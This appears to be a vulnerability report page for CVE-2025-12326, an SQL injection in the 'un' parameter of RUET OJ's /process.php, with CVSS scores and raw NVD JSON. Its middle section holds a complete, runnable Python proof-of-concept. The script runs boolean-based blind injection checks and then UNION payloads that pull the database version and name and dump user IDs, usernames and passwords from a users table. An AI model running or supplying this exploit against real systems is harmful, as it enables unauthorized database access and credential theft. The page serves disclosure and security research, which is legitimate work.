Security Vulnerability Report
中文
CVE-2025-12326 CVSS 7.3 HIGH

CVE-2025-12326

Published: 2025-10-27 21:15:37
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A vulnerability was found in shawon100 RUET OJ up to 18fa45b0a669fa1098a0b8fc629cf6856369d9a5. This vulnerability affects unknown code of the file /process.php of the component POST Request Handler. The manipulation of the argument un results in sql injection. The attack can be launched remotely. The exploit has been made public and could be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:shawonruet:ruet_oj:*:*:*:*:*:*:*:* - VULNERABLE
shawon100 RUET OJ <= 18fa45b0a669fa1098a0b8fc629cf6856369d9a5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-12326 SQL Injection PoC # Target: shawon100 RUET OJ /process.php # Parameter: un (POST Request Handler) def exploit_sqli(target_url, payload): """ SQL Injection exploitation function payload: malicious SQL injection string """ data = { 'un': payload # Vulnerable parameter } try: response = requests.post(target_url, data=data, timeout=10) return response.text except requests.exceptions.RequestException as e: return f"Error: {str(e)}" # Blind Boolean-based SQL Injection detection def check_vulnerability(target_url): """ Check if target is vulnerable by testing boolean response """ # True condition - should return expected result true_payload = "admin' AND 1=1 -- " # False condition - should return different result false_payload = "admin' AND 1=2 -- " true_resp = exploit_sqli(target_url, true_payload) false_resp = exploit_sqli(target_url, false_payload) if true_resp != false_resp: print("[+] Target is vulnerable to SQL Injection!") return True else: print("[-] Target may not be vulnerable") return False # Database enumeration using UNION-based injection def extract_database_info(target_url): """ Extract database information using UNION injection """ # Database version version_payload = "' UNION SELECT NULL,version(),NULL,NULL -- " # Database name db_payload = "' UNION SELECT NULL,database(),NULL,NULL -- " # User list users_payload = "' UNION SELECT NULL,GROUP_CONCAT(user_id,':',username,':',password),NULL,NULL FROM users -- " print("[*] Extracting database version...") print(exploit_sqli(target_url, version_payload)) print("[*] Extracting database name...") print(exploit_sqli(target_url, db_payload)) print("[*] Extracting user credentials...") print(exploit_sqli(target_url, users_payload)) if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-12326.py <target_url>") print("Example: python cve-2025-12326.py http://target.com/process.php") sys.exit(1) target = sys.argv[1] print(f"[*] Testing target: {target}") if check_vulnerability(target): print("[*] Proceeding with data extraction...") extract_database_info(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12326", "sourceIdentifier": "[email protected]", "published": "2025-10-27T21:15:36.520", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in shawon100 RUET OJ up to 18fa45b0a669fa1098a0b8fc629cf6856369d9a5. This vulnerability affects unknown code of the file /process.php of the component POST Request Handler. The manipulation of the argument un results in sql injection. The attack can be launched remotely. The exploit has been made public and could be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:shawonruet:ruet_oj:*:*:*:*:*:*:*:*", "versionEndIncluding": "2022-10-19", "matchCriteriaId": "A49CA863-91A0-43A6-81AF-E57886D0E879"}]}]}], "references": [{"url": "https://vuldb.com/?ctiid.330103", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.330103", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.674322", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.